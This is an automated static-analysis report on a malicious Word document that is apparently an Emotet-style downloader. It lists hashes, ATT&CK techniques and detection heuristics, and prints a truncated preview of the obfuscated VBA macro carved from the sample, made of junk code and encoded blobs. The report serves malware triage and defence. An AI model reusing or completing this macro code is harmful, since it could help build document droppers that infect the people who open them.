Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0146653cc94a49c9…

MALICIOUS

Office (OLE)

Size: 170.0 KB
Created: 2018-03-22 15:07:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: 75d7e03060f16dc62504b137e6bd544b
SHA-1: 5afbfa573c8e78367c6a11f96a6c3ac1e6b112f1
SHA-256: 0146653cc94a49c9f9d37c1d3a183203b32e0c62419bb8dfc351db3d18513af7
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicating that it is designed to execute automatically when the document is opened. The presence of a long encoded blob and the ClamAV detection signature 'Doc.Malware.Emodldr-10025032-0' strongly suggest that the macro's purpose is to download and execute a second-stage payload, i.e. that it acts as a downloader or dropper.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 44190 bytes
SHA-256: e45165470d60b4574e17b0b6aae1ac991946483960d24d70fb2449f1485bf772
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 26 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "CjPvDKPoXlDw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TwXGufNT"
Function wRnJFiczIE()
On Error Resume Next
Select Case oAzEB
         Case 38546
            wFjYZH = Hex(29258 - CSng(77965) - 88024 + ChrW(CWAbtC))
            mKlaf = WPwkmj
End Select
UbiSV = ukDJfH("ZMAOQAzAGQANQA3ADUAOQAzAGMAYgBhADIAMQA5AGQAOABmADAAMgA0ADgANQA0AGEAMwA4AGIANgAxADcANgAwADkAZgBiADcAMAAxADMAYgAyAGMAZAAwADkAOQBmADQAMABkADkANQA3ADgAYgAzADcAYwAyAGQAOAA5ADYAYQBlAGMAOQBjAGUAz4jZ5%a", 3, 185)
Select Case tDUOoA
         Case 12607
            MwLbqv = Hex(2362 - CSng(69173) - 31131 + ChrW(uzhRr))
            PSQMId = cIJzz
End Select
Select Case sLBsnP
         Case 99369
            ZdPQrT = Hex(81729 - CSng(98824) - 48973 + ChrW(oSnVd))
            iujss = kDnGZz
End Select
dYNjvOldcN = ukDJfH("wDGAZQBiAGIAZQBiADEAYwBlADEAMQBhAGEAYgA1ADQAMAAxADcAMwBhADMANgAyADMAZQBhADIAYgA2AGIAMABkADcAZAA1AGEAZAA5ADMAMQA0ADIANQBhADIAYQA2AGUAMAA4ADMAZgBmADQAOABmAGYAMgA3AGUAMwBkADEAMQA3AGIAMwA5ADMAYgA1ADMAk6P", 4, 193)
Select Case aCYqk
         Case 65767
            DhKGB = Hex(64746 - CSng(70354) - 66146 + ChrW(LtXhdN))
            jHBdsM = kurzwz
End Select
Select Case SvPvC
         Case 79669
            roimD = Hex(2127 - CSng(37830) - 68028 + ChrW(AvGrW))
            icZzm = OqXZKD
End Select
vHGnTzEAIj = ukDJfH("tPl1oKZQAxADkANgAzADcAZgA5ADkAMwBiADMANwBmAGEAZgA5AGMAMABiADgAMgAzAGUAZQBmADMANwBjADEAMQA0ADgAMgBlAGQAZAAxADIAMQBjADEANAA5AGIAOAA2AGUAYgBkADUAZQA3AGUAYQBiADQAvk", 7, 152)
Select Case fMqliZ
         Case 55820
            FsoJzw = Hex(41599 - CSng(50425) - 45757 + ChrW(zwPMm))
            FDkcw = NtztE
End Select
Select Case zDjXhO
         Case 32219
            RNjTNS = Hex(40574 - CSng(16509) - 14096 + ChrW(kICLt))
            wzpdIR = ZKEsfB
End Select
izkNarwztkl = ukDJfH("zwnPADEAMgA5ADkANwBjADQANgA5AGQANQAwADMAYQA2AGIAMwAwADYAYQA4ADYANQAzADcANwBkAGYAYQRPv%j", 5, 78)
Select Case IPbobz
         Case 53
            bJPiKa = Hex(2305 - CSng(85274) - 51736 + ChrW(JkbkZn))
            zfJIIZ = HKQVjO
End Select
Select Case ivFnnO
         Case 12551
            JQATDv = Hex(79222 - CSng(52145) - 69036 + ChrW(wlHla))
            jNUNIl = kdIZiE
End Select
ACpiqnvi = ukDJfH("BF2EAPQA9AHwANwBiADUAOQBhADEAMgBhADUAZAAxAGQAMwBhADUAZQA5AGIAMgBiAGQANgA1AGYAMQA5ADMANAA2ADAAYwAyADEANAAxADYAYwBhADkAMgAzADcAZgA2ADcAMgA4AGQANgA0ADQAMAAyADkAOQA1ADUAv3To", 4, 162)
Select Case PhhNwj
         Case 85071
            NERFUw = Hex(94428 - CSng(55910) - 84527 + ChrW(UMDaut))
            XhPpvW = WpzRE
End Select
Select Case zJnnF
         Case 7056
            rCGozj = Hex(76075 - CSng(22823) - 87969 + ChrW(IFSFVM))
            iRzSu = bwsoY
End Select
ftaVjsVB = ukDJfH("rYNQBiAGMANAA0ADkANAA4ADAAMQAxADEANwBmADQANgA5AGMAYQjW4tSQ", 3, 50)
Select Case ttjQIw
         Case 9341
            iSCsV = Hex(39136 - CSng(22025) - 62916 + ChrW(BAiwa))
            nEMwh = pFrOYz
End Select
Select Case lalWOj
         Case 55348
            FrwGIO = Hex(76388 - CSng(76973) - 53655 + ChrW(iiUDzA))
            UQRVw = QHnzG
End Select
PrLui = ukDJfH("XWRjKSAYgA0AGEAOQBhAGUAMgAxAGMA'|coNvErttO-seCURESTRINg iFZ", 7, 50)
Select Case IPhjtw
         Case 2939
            wUkRNM = Hex(82219 - CSng(37906) - 25349 + ChrW(hblCt))
            KdIYi = VRhGTX
End Select
Select Case tOhiv
         Case 7940
            hwiRq = Hex(54506 - CSng(50569) - 11948 + ChrW(wKsVu))
            jmLTF = Awpaw
End Select
naGvU = ukDJfH("G0oGQBmADkAMQBiAGQAYwA0AGMAMwAyADYAMABlADMAOAA1AGEAMQBlADQAZQAwADgAMAA0ADYANwA0ADAANgA1ADQAMAAzADQAOAA3ADkAYgBmAGYAZAA4ADQAZABhAGMAMwA1ADEAZQA0AGIAOABjAGUAZQBjAGEAYwBjADYUvY", 6, 165)
Select Case SFmHa
         Case 94015
            iCNrkI = Hex(27962 - CSng(68125) - 86225 + ChrW(OiNPY))
            vScwEh = prtEI
End Select
Selec
... (truncated)